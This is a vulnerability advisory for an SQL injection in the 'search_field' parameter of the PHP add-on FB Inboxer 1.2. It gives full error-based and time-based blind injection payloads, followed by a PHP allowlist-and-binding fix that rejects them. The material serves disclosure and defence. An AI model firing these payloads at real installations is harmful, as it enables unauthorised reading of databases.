Exploits / Vulnerability Discovered: 2018-08-02
Type: webapps
Platform: php
This exploit / vulnerability (Pageresponse FB Inboxer Addon 1.2 'search_field' SQL injection) is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: FB Inboxer 1.2 - 'search_field' SQL Injection
# Google Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371
# Version: 1.2
# Tested on: Kali Linux
====================================================
Description: The vulnerability allows an attacker to inject SQL commands
through the 'search_field' parameter of the search section in the
management panel.
Parameter: search_field (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search_text=tes&search_field=name AND (SELECT 4580 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(4580=4580,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: search_text=tes&search_field=name AND SLEEP(5)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
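
Mitigation sketch for the search request described above, as an added example that is not the vendor's or the exploit author's code: the column named in 'search_field' (and the sort column) is accepted only if it matches a fixed allowlist, and every value is bound. It assumes PDO with the pdo_sqlite driver for a self-contained demo; the `contacts` table, the `email` column and the function names are hypothetical.

```php
<?php
declare(strict_types=1);
// Assumed schema: 'name' and 'id' come from the request shown on this page;
// the 'contacts' table and the 'email' column are hypothetical.
const SEARCHABLE = ['name', 'email'];
const SORTABLE   = ['id', 'name', 'email'];

function buildSearch(array $post): array
{
    // Identifiers cannot be bound as parameters, so search_field and
    // order_by[0] must match a fixed allowlist exactly (strict comparison).
    $field = $post['search_field'] ?? null;
    $order = is_array($post['order_by'] ?? null) ? $post['order_by'] : [];
    $sort  = $order[0] ?? 'id';
    if (!in_array($field, SEARCHABLE, true) || !in_array($sort, SORTABLE, true)) {
        throw new InvalidArgumentException('column not allowed');
    }
    // Direction is mapped to one of two literals, never copied from input.
    $dir     = (($order[1] ?? 'asc') === 'desc') ? 'DESC' : 'ASC';
    $perPage = max(1, min(100, (int) ($post['per_page'] ?? 15)));
    $page    = max(1, (int) ($post['page'] ?? 1));
    $text    = is_string($post['search_text'] ?? null) ? $post['search_text'] : '';
    $sql = "SELECT id, name, email FROM contacts WHERE $field LIKE :text "
         . "ORDER BY $sort $dir LIMIT :limit OFFSET :offset";
    return [$sql, [':text' => "%$text%", ':limit' => $perPage, ':offset' => ($page - 1) * $perPage]];
}

function runSearch(PDO $db, array $post): array
{
    [$sql, $params] = buildSearch($post);
    $stmt = $db->prepare($sql);
    foreach ($params as $name => $value) {   // values are bound, never concatenated
        $stmt->bindValue($name, $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT, email TEXT)");
$db->exec("INSERT INTO contacts (name, email) VALUES ('tester', 't@example.test')");
$ok = ['search_text' => 'tes', 'search_field' => 'name', 'per_page' => '15',
       'order_by' => ['id', 'asc'], 'page' => '1'];
echo count(runSearch($db, $ok)), " row(s)\n";
try {   // search_field carrying more than a column name, as in the report above
    runSearch($db, ['search_field' => 'name AND SLEEP(5)'] + $ok);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Both payload types in the report arrive through the same 'search_field' value, so the allowlist check stops them before any SQL text is assembled.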